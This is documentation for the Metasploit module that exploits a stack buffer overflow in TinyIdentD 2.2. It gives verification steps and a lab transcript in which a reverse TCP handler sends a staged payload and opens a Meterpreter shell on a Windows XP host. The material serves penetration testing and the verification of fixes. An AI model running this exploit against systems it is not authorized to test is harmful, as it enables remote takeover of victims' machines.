## Vulnerable Application

  This module exploits a stack based buffer overflow in TinyIdentD
  version 2.2.

  If we send a long string to the ident service we can overwrite the
  return address and execute arbitrary code. Credit to Maarten Boone.

  Download:

  * https://download.cnet.com/Tiny-IdentD/3000-2150_4-10147419.html


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/tiny_identd_overflow`
  3. `set RHOSTS <rhost>`
  4. `set TARGET <target>`
  5. `run`
  6. You should get a new session


## Options


## Scenarios

### TinyIdentD 2.2 on Windows XP SP0 - English (x86)

  ```
  msf5 > use exploit/windows/misc/tiny_identd_overflow
  msf5 exploit(windows/misc/tiny_identd_overflow) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Automatic
     1   Windows 2000 Server SP4 - English
     2   Windows 2000 Pro All - English
     3   Windows 2000 Pro All - Italian
     4   Windows 2000 Pro All - French
     5   Windows XP SP0/1 - English
     6   Windows XP SP2 - English
     7   Windows XP SP2 - Italian


  msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
  target => 5
  msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
  rhosts => 172.16.191.140
  msf5 exploit(windows/misc/tiny_identd_overflow) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
  [*] Sending stage (176195 bytes) to 172.16.191.140
  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400

  meterpreter > sysinfo 
  Computer        : WINXP
  OS              : Windows XP (5.1 Build 2600).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter > 
  ```
